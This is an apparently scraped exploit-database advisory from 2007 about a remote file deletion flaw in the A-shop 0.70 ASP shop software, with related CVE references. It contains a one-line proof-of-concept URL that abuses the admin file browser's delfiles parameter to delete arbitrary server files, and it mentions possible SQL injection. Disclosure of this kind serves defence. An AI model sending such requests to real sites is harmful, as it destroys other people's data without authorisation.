Lucene search
TimqEDB-ID:4198HistoryJul 18, 2007 - 12:00 a.m.
A-shop 0.70 - Remote File Deletion
2007-07-1800:00:00
Timq
www.exploit-db.com
25
AI Score
7.4
Confidence
Low
A-shop <=0.70 Multiple vulnerabilities
Found Bug: Timq
site:http://private-node.net
email:[email protected]
Vendor:http://www.rammdev.com/ashop/
PoC:
http://site.com/admin/filebrowser.asp?folder=products&delfiles=[del any file on server]
It is possible to delete not only the files in the folders listed,
but also ouside its directory.
Also possible sql injections in other areas.
# milw0rm.com [2007-07-18]Related
cve
cve
CVE-2007-3937
2007-07-21 00:30:00
CVE-2007-3936
2007-07-21 00:30:00
cvelist
cvelist
CVE-2007-3937
2007-07-21 00:00:00
CVE-2007-3936
2007-07-21 00:00:00
prion
prion
Sql injection
2007-07-21 00:30:00
Directory traversal
2007-07-21 00:30:00
nvd
nvd
CVE-2007-3937
2007-07-21 00:30:00
CVE-2007-3936
2007-07-21 00:30:00